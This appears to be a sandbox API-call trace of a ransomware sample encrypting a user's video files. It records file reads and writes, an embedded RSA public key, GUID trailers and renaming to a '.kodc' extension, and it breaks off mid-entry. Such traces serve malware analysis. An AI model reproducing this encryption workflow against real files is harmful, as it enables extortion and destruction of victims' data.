[0100.521] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.522] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.522] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10760) returned 0x9bb8968 [0100.522] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c7c0 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cf8 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c808 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d10 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d40 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d58 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.523] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d40 | out: hHeap=0x630000) returned 1 [0100.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d58 | out: hHeap=0x630000) returned 1 [0100.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7d58 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7d40 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0100.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0100.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d58 | out: hHeap=0x630000) returned 1 [0100.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d40 | out: hHeap=0x630000) returned 1 [0100.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.524] GetCurrentThreadId () returned 0x42c [0100.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6f58 [0100.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.525] GetCurrentThreadId () returned 0x42c [0100.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d40 [0100.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d58 [0100.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d28 [0100.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.527] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1075c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.527] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.528] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.528] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.528] CloseHandle (hObject=0x5cc) returned 1 [0100.540] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ui4peF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ui4pef.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ui4peF.flv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ui4pef.flv.kodc")) returned 1 [0100.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.541] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.542] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c46f3a0, ftCreationTime.dwHighDateTime=0x1d5c0c9, ftLastAccessTime.dwLowDateTime=0x8d0e8b50, ftLastAccessTime.dwHighDateTime=0x1d5c4ab, ftLastWriteTime.dwLowDateTime=0x8d0e8b50, ftLastWriteTime.dwHighDateTime=0x1d5c4ab, nFileSizeHigh=0x0, nFileSizeLow=0xebff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ViLsu.mp4", cAlternateFileName="")) returned 1 [0100.542] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ViLsu.mp4") returned=".mp4" [0100.542] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ViLsu.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vilsu.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.543] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=60415) returned 1 [0100.543] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.546] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xebd9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.547] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.548] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.548] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xebff, lpOverlapped=0x0) returned 1 [0100.549] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.549] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.549] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.549] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.550] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.550] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.550] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.550] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.550] GetLastError () returned 0x0 [0100.550] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.550] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.551] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.551] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.551] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xec00) returned 0x9bb8968 [0100.551] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c808 [0100.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d10 [0100.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c850 [0100.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d28 [0100.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d58 [0100.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d70 [0100.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.552] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d58 | out: hHeap=0x630000) returned 1 [0100.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d70 | out: hHeap=0x630000) returned 1 [0100.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0100.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7d70 [0100.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7d58 [0100.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0100.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0100.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0100.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d70 | out: hHeap=0x630000) returned 1 [0100.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d58 | out: hHeap=0x630000) returned 1 [0100.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.553] GetCurrentThreadId () returned 0x42c [0100.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6fe8 [0100.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.554] GetCurrentThreadId () returned 0x42c [0100.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 